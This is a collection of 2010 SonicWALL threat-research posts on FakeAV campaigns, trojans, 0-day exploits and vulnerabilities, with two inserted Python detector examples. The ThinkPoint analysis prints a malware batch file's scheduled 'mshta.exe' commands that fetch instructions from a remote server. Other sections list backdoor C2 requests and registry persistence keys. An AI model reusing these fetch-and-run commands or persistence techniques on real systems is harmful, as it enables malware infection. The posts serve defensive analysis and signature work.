Posts

Holiday Shopping – Black Hat SEO (Nov 18, 2010)

The SonicWALL UTM Research team discovered a number of polluted results appearing in search engine results for holiday shopping related search terms. Malware authors often use the SEO poisoning technique to lure unsuspecting users into clicking on malicious links strategically placed in search engine results. For instance, the search term “Walmart Black Friday Sales 2010” leads users to the malicious search results shown below.

screenshot

If the user clicks on the malicious link, the following happens on the victim’s machine:

  • The initial link redirects the user to another page containing JavaScript, an extract of which is shown below. Based on the user’s web browser it redirects to an appropriate landing page.

    screenshot

  • If the user is using Internet Explorer, it redirects to a FakeAV landing page:

    screenshot

  • If the user is using Firefox, it redirects to a fake Firefox update page suggesting an upgrade to Flash Player:

    screenshot

    If the user downloads and executes the fake Flash update, it performs the following on the victim’s machine:

    • Drops files:
      • %temp%/Img.exe [Detected as GAV: Renos.MJ_4 (Trojan)]
      • %temp%/Imh.exe [Detected as GAV: Renos.MJ_4 (Trojan)]
      • %temp%/Imi.exe [Detected as GAV: Renos.MJ_4 (Trojan)]
      • %windir%/Ipisoa.exe (Copy of Img.exe) [Detected as GAV: Renos.MJ_4 (Trojan)]

    • Creates registry entry to ensure that the dropped malware runs on every system reboot:
      • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run: “%temp%/Imh.exe”
    • Posts confidential data back to remote servers

      screenshot

    • It redirects the browser and opens pop-up windows

Similar results were observed for other post-Thanksgiving holiday shopping season related search terms such as “Black Friday” and “Cyber Monday”.

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

GAV: Renos.MJ_4 (Trojan)
GAV: FakeAlert.SR (Trojan)
GAV: JSRedir.BF (Trojan)
GAV: Suspicious#fakeav.html (Trojan)

screenshot

Novell GroupWise Internet Agent Content-Type BO (Nov 18, 2010)

GroupWise is a messaging and collaborative software platform from Novell that supports email, calendaring, personal information management, instant messaging, and document management. The platform consists of the client software, which is available for Windows, Mac OS X, and Linux, and the server software, which is supported on Windows Server, NetWare, and Linux. The latest generation of the platform is GroupWise 8. Novell GroupWise Internet Agent is a component of Novell GroupWise and provides email services, supporting SMTP, POP, and IMAP protocols.

Simple Mail Transfer Protocol (SMTP) is an Internet standard for electronic mail (e-mail) transmission across Internet Protocol (IP) networks. SMTP was first defined by RFC 821 and last updated by RFC 5321 (2008). SMTP is specified for outgoing mail transport and uses TCP port 25. A typical example of sending a message via SMTP to two mailboxes (alice and theboss) located in the same mail domain (example.com) is reproduced in the following session exchange:

 S: 220 smtp.example.com ESMTP Postfix
 C: HELO relay.example.org
 S: 250 Hello relay.example.org, I am glad to meet you
 C: MAIL FROM:
 S: 250 Ok
 C: RCPT TO:
 S: 250 Ok
 C: RCPT TO:
 S: 250 Ok
 C: DATA
 S: 354 End data with .
 C: From: "Bob Example"
 C: To: "Alice Example"
 C: Cc: theboss@example.com
 C: Date: Tue, 15 Jan 2008 16:02:43 -0500
 C: Subject: Test message
 C:
 C: Hello Alice.
 C: This is a test message with 5 header fields and 4 lines in the message body.
 C: Your friend,
 C: Bob
 C: .
 S: 250 Ok: queued as 12345
 C: QUIT
 S: 221 Bye

The Content-Type header is an optional message header in SMTP traffic. Its type declares the general kind of data, while the subtype specifies a specific format for that type of data. A Content-Type of “text/plain” is sufficient to tell an agent that the data is text. Additional entities (parameters) in the field are separated by semicolons. The Content-Type header has the following format:

 Content-Type: text/plain; [OTHER ENTITIES] 

A buffer-overflow vulnerability exists in the Novell GroupWise Internet Agent service. More specifically, the vulnerability is due to a boundary failure in the methods responsible for processing the data inside the Content-Type header field of the message being processed. Remote attackers could exploit this vulnerability by supplying a specially crafted “Content-Type” header to the server, which allows for arbitrary code injection and execution with SYSTEM privileges.
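The kind of check a mail gateway can make before a Content-Type header reaches a vulnerable parser, written as an added example (not SonicWALL’s code or signature logic): it unfolds the headers of a message’s DATA section, splits Content-Type into type, subtype and parameters, and flags a header value or parameter that is far longer than legitimate mail ever produces. The two length thresholds and the two sample messages are assumptions constructed for the example.

```python
import re
from typing import Dict, List, Tuple

# Thresholds are assumptions for this example, not values from the advisory:
# a legitimate Content-Type value is short, so anything far longer is worth
# flagging before it reaches the mail server's header parser.
MAX_HEADER_VALUE = 256
MAX_PARAM_VALUE = 128

# type "/" subtype, then the parameter tail (everything from the first ";")
_TYPE_RE = re.compile(r"^\s*([\w!#$&^.+-]+)/([\w!#$&^.+-]+)\s*(.*)$")


def parse_headers(data: str) -> List[Tuple[str, str]]:
    """Split the DATA section into (name, value) pairs, unfolding
    continuation lines (those starting with whitespace, per RFC 5322)."""
    headers: List[Tuple[str, str]] = []
    for raw in data.split("\r\n"):
        if raw == "":
            break  # the empty line ends the header block; the body follows
        if raw[0] in " \t" and headers:
            name, value = headers[-1]
            headers[-1] = (name, value + " " + raw.strip())
        elif ":" in raw:
            name, value = raw.split(":", 1)
            headers.append((name.strip().lower(), value.strip()))
    return headers


def split_params(tail: str) -> Dict[str, str]:
    """Parse '; key=value; key2="value"' into a dict (quotes stripped)."""
    params: Dict[str, str] = {}
    for part in tail.split(";"):
        part = part.strip()
        if part:
            key, _, val = part.partition("=")
            params[key.strip().lower()] = val.strip().strip('"')
    return params


def check_content_type(value: str) -> Tuple[str, Dict[str, str]]:
    """Return ('ok', params) or ('suspicious: <reason>', params)."""
    if len(value) > MAX_HEADER_VALUE:
        return f"suspicious: header value is {len(value)} bytes", {}
    m = _TYPE_RE.match(value)
    if not m:
        return "suspicious: no type/subtype", {}
    params = split_params(m.group(3))
    for key, val in params.items():
        if len(val) > MAX_PARAM_VALUE:
            return f"suspicious: parameter {key} is {len(val)} bytes", params
    return "ok", params


def inspect_message(data: str) -> str:
    """Verdict for one message's DATA section; a message with no
    Content-Type header is fine (it defaults to text/plain)."""
    for name, value in parse_headers(data):
        if name == "content-type":
            return check_content_type(value)[0]
    return "ok"


# Constructed samples: a normal message with a folded Content-Type header,
# and one whose Content-Type carries an absurdly long parameter.
NORMAL = ("From: \"Bob Example\" <bob@example.org>\r\nTo: <alice@example.com>\r\n"
          "Content-Type: text/plain;\r\n\tcharset=us-ascii\r\n"
          "Subject: Test message\r\n\r\nHello Alice.\r\n")
OVERSIZED = ("From: <bob@example.org>\r\nTo: <alice@example.com>\r\n"
             "Content-Type: text/plain; name=\"" + "A" * 4000 + "\"\r\n\r\nx\r\n")
```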

The SonicWALL UTM team has researched this vulnerability and created the following IPS signatures to detect attacks targeting it:

  • 6010 Novell GroupWise Internet Agent Content-Type BO
  • 6011 Novell GroupWise Internet Agent Content-Type BO 2

This vulnerability has not been assigned a Common Vulnerabilities and Exposures (CVE) identifier.

ThinkPoint FakeAV (Nov 12, 2010)

The SonicWALL UTM Research team received reports of a new fake antivirus Trojan in the wild. This Trojan attempts to access a PHP script on a compromised web server on the Internet for further instructions.

During our research we found that the Trojan will masquerade as the legitimate antivirus product “Microsoft Security Essentials”, complete with fake pop-up alerts and detailed scan results.

screenshot

screenshot

The screenshots seen above result from attempting to run specific legitimate programs, such as Internet Explorer and RegEdit, which this fake antivirus singles out as potential threats to the system.

The Trojan performs the following activities upon execution:

  • Drops the following three files on the compromised machine:
    • C:\Documents and Settings\User\Application Data\444.bat
      • Contains a script with 24 task entries, e.g.:

          at 00:23 /every:M,T,W,Th,F,S,Su mshta.exe http://91.188.x.x/77t.php?olala=4032432825575030
          at 01:23 /every:M,T,W,Th,F,S,Su mshta.exe http://91.188.x.x/77t.php?olala=4032432825575030
          at 02:23 /every:M,T,W,Th,F,S,Su mshta.exe http://91.188.x.x/77t.php?olala=4032432825575030
          ...

    • C:\Documents and Settings\User\Application Data\asdsada.bat
      • Contains a script to delete the FakeAV installer.

    • C:\Documents and Settings\User\Application Data\hotfix.exe

  • Creates the following registry entry to ensure regular startup:
    • HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell “C:\Documents and Settings\User\Application Data\hotfix.exe”

  • Additional registry keys created:
    • HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache C:\Documents and Settings\User\Application Data\444.bat “444”
    • HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache C:\Documents and Settings\User\Application Data\asdsada.bat “asdsada”
  • Creates 24 scheduled tasks in C:\WINDOWS\Tasks to ensure it runs hourly:
    • C:\WINDOWS\Tasks\At<1-24>.job

  • Attempts to use mshta.exe to open a URL in order to receive further instructions:
    • URL: http://91.188.x.x/77t.php?olala=4032432825575030

SonicWALL Gateway AntiVirus provided protection against this threat via the following signature:

GAV: FakeAv.IOX (Trojan)

Microsoft Security Bulletins Coverage (Nov 09, 2010)

SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of November, 2010. A list of issues reported, along with SonicWALL coverage information follows:

MS10-087 Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2423930)

  • CVE-2010-3333 – RTF Stack Buffer Overflow Vulnerability
    IPS 5950 Word RTF File Parsing Stack BO
  • CVE-2010-3334 – Office Art Drawing Records Vulnerability
    IPS 5955 Office Art Drawing Records Vulnerability
  • CVE-2010-3335 – Drawing Exception Handling Vulnerability
    IPS 5956 Malicious Excel Document 7b
  • CVE-2010-3336 – MSO Large SPID Read AV Vulnerability
    IPS 5957 Malicious Word Document 5b
    IPS 5958 Malicious Excel Document 8b
  • CVE-2010-3337 – Insecure Library Loading Vulnerability
    IPS 5726 Possible Binary Planting Attempt

MS10-088 Vulnerabilities in Microsoft PowerPoint Could Allow Remote Code Execution (2293386)

  • CVE-2010-2572 – PowerPoint Parsing Buffer Overflow Vulnerability
    IPS 5954 Malicious PowerPoint Document 1b
  • CVE-2010-2573 – PowerPoint Integer Underflow Causes Heap Corruption Vulnerability
    IPS 5945 Malicious PowerPoint Document 1b

MS10-089 Vulnerabilities in Forefront Unified Access Gateway (UAG) Could Allow Elevation of Privilege (2316074)

  • CVE-2010-2732 – UAG Redirection Spoofing Vulnerability
    Note: There is no way to differentiate malformed and legitimate traffic.
  • CVE-2010-2733 – UAG XSS Allows EOP Vulnerability
    Note: There are no known public exploits targeting this vulnerability.
  • CVE-2010-2734 – XSS Issue on UAG Mobile Portal Website in Forefront Unified Access Gateway Vulnerability
    Note: There are no known public exploits targeting this vulnerability.
  • CVE-2010-3936 – XSS in Signurl.asp Vulnerability
    Note: There are no known public exploits targeting this vulnerability.

MS Excel PtgExtraArray Parsing Memory Corruption (Nov 5th, 2010)

Microsoft Excel is a spreadsheet application released as a component of the Microsoft Office suite. The application can create complex spreadsheets with multiple workbooks, formulas, and various data sources. The file format used for storing Microsoft Excel documents is known as the Binary Interchange File Format (BIFF).

In BIFF5 and later versions, the data inside all Office document files is stored in a series of streams. These streams contain metadata about the document, such as the author name, subject, and, in the case of Excel documents, individual sheet names. Excel-specific data is organized as a series of Records. The common structure of an Excel Record is shown below:

Offset  Size     Contents
------  -------  ------------------------------------------
0x0000  int16    Identifier (Type)
0x0002  int16    Size of the following data (n)
0x0004  char[n]  Record Data

The Formula record (type 0x06) describes a cell that contains a formula in the Excel file. The Formula record structure is shown below:

Offset  Size     Contents
------  -------  ------------------------------------------
0x0000  int16    type (0x6)
0x0002  int16    length of the Formula record data
0x0004  int16    row
0x0006  int16    column
0x0008  int16    index to XF record
0x000A  char[8]  current value of the formula
0x0012  int16    option flags
0x0014  int32    chn
0x0018  int16    cce length of the expression (n)
0x001A  char[n]  rgce parsed expression

Within the Formula record, the rgce field contains the formula in its parsed format, which is the internal tokenized representation of an Excel formula. A parsed expression contains a sequence of tokens, each of which consists of a token type and a token value.

When an rgce contains one or more tokens that require extra data, the containing formula structure includes an RgbExtra section holding the data for those tokens. One of the structures contained within the RgbExtra section is PtgExtraArray, defined as shown:

Offset  Size     Contents
------  -------  ------------------------------------------
0x0000  char     cols
0x0001  int16    rows
0x0003  n        SerAr[n]

A memory corruption vulnerability exists in Microsoft Office Excel. The vulnerability is due to improper processing of the PtgExtraArray structure within the Formula record of Excel files. The vulnerable code uses the values of the cols and rows fields of the PtgExtraArray structure to calculate the number of elements in the SerAr[] array. The result of this calculation is not verified. The value is then used as the counter of a loop that copies SerAr structures sequentially into a memory buffer.

If the total size of the SerAr structures is large enough then the memory copy loop may write past the boundary specified for the Formula record, overwriting potentially critical data.
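The missing check, shown as an added example rather than Microsoft’s or SonicWALL’s code: a parser that derives the SerAr element count from cols and rows exactly as the text describes, then refuses to walk a single element beyond the end of the enclosing Formula record. The caller passes the number of bytes left in the record; the SerAr layouts (every element starts with a 1-byte type, fixed types are 9 bytes, SerStr carries a 2-byte character count and a flags byte) and the "stored minus one" convention for cols and rows are taken from the MS-XLS specification and are not stated on this page, and the sample byte strings are constructed.

```python
import struct
from typing import Tuple

# SerAr layouts assumed from the MS-XLS specification (not stated on the
# page): each element starts with a 1-byte type; SerNil/SerNum/SerBool/SerErr
# are 9 bytes in total, SerStr (0x02) is 1 + 2-byte cch + 1 flags byte + text.
SER_FIXED_SIZE = {0x00: 9, 0x01: 9, 0x04: 9, 0x10: 9}
SER_STR = 0x02
MIN_SERAR = 4  # the smallest possible element: a SerStr with cch = 0


def parse_ptg_extra_array(buf: bytes, limit: int) -> Tuple[str, int]:
    """Walk a PtgExtraArray that must fit inside buf[:limit], where limit is
    the number of bytes left in the enclosing Formula record. Returns
    (verdict, element_count). The count is computed from cols/rows as the
    text describes; the guard the vulnerable code lacks is that every SerAr
    is confirmed to lie inside the record before anything would be copied."""
    if limit < 3 or limit > len(buf):
        return "truncated: no room for cols/rows", 0
    cols = buf[0]
    rows = struct.unpack_from("<H", buf, 1)[0]
    # cols and rows are stored minus one (MS-XLS convention)
    count = (cols + 1) * (rows + 1)
    # Cheapest guard first: a count that cannot possibly fit even with the
    # smallest elements is rejected without walking anything.
    if 3 + count * MIN_SERAR > limit:
        return f"overflow: {count} elements need >= {count * MIN_SERAR} bytes, only {limit - 3} left", count
    off = 3
    for _ in range(count):
        if off >= limit:
            return "overflow: element starts past the record", count
        kind = buf[off]
        if kind in SER_FIXED_SIZE:
            size = SER_FIXED_SIZE[kind]
        elif kind == SER_STR:
            if off + 4 > limit:
                return "overflow: SerStr header runs past the record", count
            cch = struct.unpack_from("<H", buf, off + 1)[0]
            wide = buf[off + 3] & 1  # fHighByte: 2 bytes per character when set
            size = 4 + cch * (2 if wide else 1)
        else:
            return f"malformed: unknown SerAr type 0x{kind:02x}", count
        if off + size > limit:
            return "overflow: element runs past the record", count
        off += size
    return "ok", count


# Constructed samples. BENIGN: cols=1, rows=0 -> 2 elements, a SerNum (1.0)
# and a SerStr ("ab"). CRAFTED: cols=0xFF, rows=0xFFFF -> 16777216 elements
# declared with only a few bytes of data behind them.
BENIGN = (b"\x01" + b"\x00\x00"
          + b"\x01" + struct.pack("<d", 1.0)
          + b"\x02" + b"\x02\x00" + b"\x00" + b"ab")
CRAFTED = b"\xff" + b"\xff\xff" + b"\x01" + struct.pack("<d", 1.0)

if __name__ == "__main__":
    print(parse_ptg_extra_array(BENIGN, len(BENIGN)))
    print(parse_ptg_extra_array(CRAFTED, len(CRAFTED)))
```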

Exploitation of this flaw may result in arbitrary code execution. Remote attackers could exploit this vulnerability by persuading unsuspecting users to open a crafted Excel file. Successful exploitation would allow arbitrary code injection and execution in the security context of the logged in user.

SonicWall has released an IPS signature to address a known exploit targeting this vulnerability. The following signature was released:

  • 5915 – MS Excel PtgExtraArray Parsing Memory Corruption PoC 2 (MS10-080)

This vulnerability has been assigned CVE-2010-3231 by MITRE. The vendor has released an advisory regarding this issue.

New IE 0-day Vulnerability (Nov 5, 2010)

The SonicWALL UTM Research team received reports of a new Internet Explorer 0-day vulnerability, reported here, being exploited in the wild. Internet Explorer versions 6, 7 and 8 are affected by it. The vulnerability is actively being targeted in the wild by specially crafted HTML pages on compromised sites.

The HTML page contains heavily obfuscated malicious JavaScript code that encloses the shellcode and a NOP sled. Upon a successful exploit attempt, the shellcode is executed and leads to the download and execution of a malicious executable file on the victim machine.

During our research we found the shellcode enclosed within the JavaScript to be encrypted; a snippet of the decrypted code can be seen below:

screenshot

The code seen above leads to the download of linkbl.gif file from a compromised site, which is an encrypted malicious executable and has a GIF header to avoid AV detection. The file gets decrypted and the GIF header is replaced by MZ header on the victim machine.

The malware performs following activities upon execution:

  • Drops the following two files on the victim machine:
    • (STARTUP)/ctfmon.exe [Detected as GAV: Agent.IEM (Trojan)]
    • (SYSTEM32)/msnetacsvc.dll [Detected as GAV: Pirpi.D (Trojan)]

  • Creates the following registry entries to ensure that the dropped malware runs on every system reboot:
    • HKLM_SYSTEM_Services\NWCWorkstation\Parameters\ServiceDll: “%SystemRoot%\System32\msnetacsvc.dll”
    • HKLM_SYSTEM_Services\NWCWorkstation\ImagePath: “%SystemRoot%\System32\svchost.exe -k netsvcs”
    • HKLM_SYSTEM_Services\NWCWorkstation\DisplayName: “NetWare Workstations”
  • Opens a backdoor on the victim machine and attempts to connect to the IP address of a server hosted in Poland. The server was still actively serving encrypted command files at the time of writing this alert. Sample command files requested:
    • GET /bbs/OmIxA9gILmICAAAAPDlUKWrsYsjh0XQxOpixOpixOpiA.gif
    • GET /binary/jXor5LTseXmEAAAAihV0f-Pux4Xbv_grj1Wrj1Wrj1UA.rar
    • GET /picture/OdEw2TlxLdEDAAAAPThVKGntYcfg0HUwO9ewO9ewO9eA.jpg
    • GET /images/Y6V8BWHA1AUIAAAAWtefUqtsaX7fGXD9g5mA.gif
    • GET /news/kHgu4hdmhHeCAAAAlx7Xgkpzwkh7xecukL8ukL8ukL6A.jpg
    • GET /pic/9AWMBYsPcAUgAAAA8un9djhBrNp2tiOM9IoM9IoM9ImA.bmp

    Directories contacted on the server include bbs, binary, pic, picture, image, images, index, and news.

SonicWALL Gateway AntiVirus provided protection against this threat via the following signatures:

GAV: CVE-2010-3962.A (Exploit)
GAV: Pirpi.D#dldr (Trojan)
GAV: Agent.IEM (Trojan)
GAV: Pirpi.D (Trojan)
IDP: 5908 Malicious HTML Style Tag 1

IBM Rational Products Backdoor Account Access (Oct 29, 2010)

IBM Rational is a web-based quality management solution that integrates the management and deployment of test environments within the quality management lifecycle. It incorporates Apache Tomcat to serve custom web applications.

To connect to a Tomcat application, a user must provide valid credentials. The user’s username and password will be included in the “Authorization:” HTTP header with each request.

A security-restriction-bypass vulnerability exists in IBM Rational products. Tomcat stores its user credentials within the configuration file tomcat-users.xml. When IBM Rational is installed, the user ADMIN is added to the configuration file with a default password; the role “manager” is also associated with this user. In an attack scenario, a remote attacker can use these default credentials to upload and run arbitrary web applications on the vulnerable system, within the security context of the affected process.

For more information about this vulnerability, please see SecurityFocus bid 44172.

SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:

  • 5890 IBM Rational QM/TLM Default Account Access

New Adobe Acrobat 0-day Vuln (Oct 28, 2010)

The SonicWALL UTM Research team received reports of a new Adobe 0-day vulnerability, reported here, being exploited in the wild. This new vulnerability is being targeted by a specially crafted PDF file. Upon a successful exploit attempt, it drops and executes a malicious executable file on the victim machine.

Installation:

Once the user opens the malicious PDF file, it drops the following payloads in the %TEMP% folder:

  • ~temp.bat
    – Waits for 3 seconds
    – Cleans up the crashed Adobe Acrobat application by terminating the running instance
    – Opens a clean PDF file that it drops, so that everything appears normal to the end user
    The content of the file ~temp.bat looks like:

    screenshot

  • nsunday.exe – [GAV: Wisp.A_2 (Trojan)]
    – the malicious payload executable

After a successful exploit attempt on the Adobe Acrobat application, control is transferred to nsunday.exe to continue the infection.

Malware Routine:

  • Drops the malicious file nsunday.dll in the %TEMP% folder and injects it into the following running processes:
    • iexplore.exe
    • outlook.exe
    • firefox.exe
  • Creates the following registry entry to ensure that the malware runs on every system reboot:
    • Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] Value: nsunday
      Data: “{user}\Local Settings\Temp\nsunday.exe -installkys”
  • Contacts the following domain:
    • news.mysundayparty.com
  • Requests commands from a remote URL:
    • news.m{REMOVE}/kys_allow_get.asp?name=getkys.kys

    Sample screenshot of the commands received:

    screenshot

    These commands include:

    • Downloading other malicious files
    • Uploading files to the remote server
    • Retrieving system information

    Sample screenshot of the information retrieved from the system:

    screenshot

  • Uploads the retrieved system information to a remote URL:
    • news.m{REMOVE}/kys_allow_put.asp?type=

Other dropped files:

  • %TEMP%\gdnsunday.tmp – text file containing the commands received from the remote server
  • %TEMP%\gnsunday.tmp – encrypted data
  • %TEMP%\pdnsunday.tmp – text file containing the gathered system information

SonicWALL Gateway AntiVirus provided protection against this malware via the following:

GAV: Wisp.A_2 (Trojan)
GAV: PDF.JS_3 (Exploit)
IPS: Adobe Shockwave rcsL Chunk Memory Corruption PoC
IPS: Adobe Shockwave rcsL Chunk Memory Corruption PoC 2

HP Data Protector Media Operations DoS (Oct 22, 2010)

HP Data Protector Media Operations is a life cycle media management solution providing tracking and management of off-line storage media such as magnetic tapes. The HP Data Protector Media Operations service is provided by the DBServer.exe process. By default, the process listens for connections on TCP port 19813.

A denial of service vulnerability exists in the HP Data Protector Media Operations server process. Specifically, the vulnerability is due to a NULL pointer dereference when processing incoming requests. The NULL pointer dereference triggers an invalid memory access and crashes the server process. A remote attacker can exploit this vulnerability by sending crafted requests to the target server. Successful exploitation causes DBServer.exe to terminate abnormally, resulting in a denial-of-service condition.

For more information about this vulnerability, please see Secunia Advisory SA41698.

SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:

  • 5866 HP Data Protector Media Operations DoS

Bandok Keylogger Trojan (Oct 21, 2010)

SonicWALL UTM Research received reports of a new backdoor Trojan being spammed in the wild. The Trojan arrives via email as an attachment.

If the user downloads and executes the file attachment from the email then it performs the following activities on the victim machine:

  • Process Information:
    • It creates the following processes:
      • firefox.exe
      • cfmon_.exe
    • It creates the following mutexes:
      • BEN333JDJDJ
      • fHDVQUw
  • Network Activity:
    • It connects to {removed}.com and downloads the following files.
    • screenshot

    • It uploads harvested information back to the same domain. Here is a screenshot of currently harvested user information as seen on the domain, indexed by username.
    • screenshot

  • File Activity:

    It creates the following files:

    • %windir%\system32\dream\bupl.dll
    • %windir%\system32\dream\bupws.dll
    • %windir%\system32\dream\sqlite3.dll
    • %windir%\system32\dream\ctfmon_.exe – Detected as GAV: Bandok.WG_2 (Trojan)
    • %windir%\system32\dream\dreamwaver.exe (copy of itself) – Detected as GAV: Bandok.WG (Trojan)
    • %windir%\system32\dream.bns
    • %windir%\system32\dream\blogs{DD}_{MM}_{YYYY}.html
      This file contains information about open windows and associated keystrokes, which is uploaded to the domain. A sample of the file is shown below:

      screenshot

  • Registry Activity:
    • It creates “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run {VB45O-P98RE-KJL43-NMB4-DFR3T}” with value “%windir%\System32\dream\dreamwaver.exe” to ensure that it runs on every reboot
  • Information Harvesting:
    • It logs keystrokes for each active application
    • It logs form data from open web sessions
    • It harvests e-mail addresses from address book

SonicWALL Gateway AntiVirus provides protection against this Bandok Trojan with the following signatures:
  GAV: Bandok.WG (Trojan)
  GAV: Bandok.WG_2 (Trojan)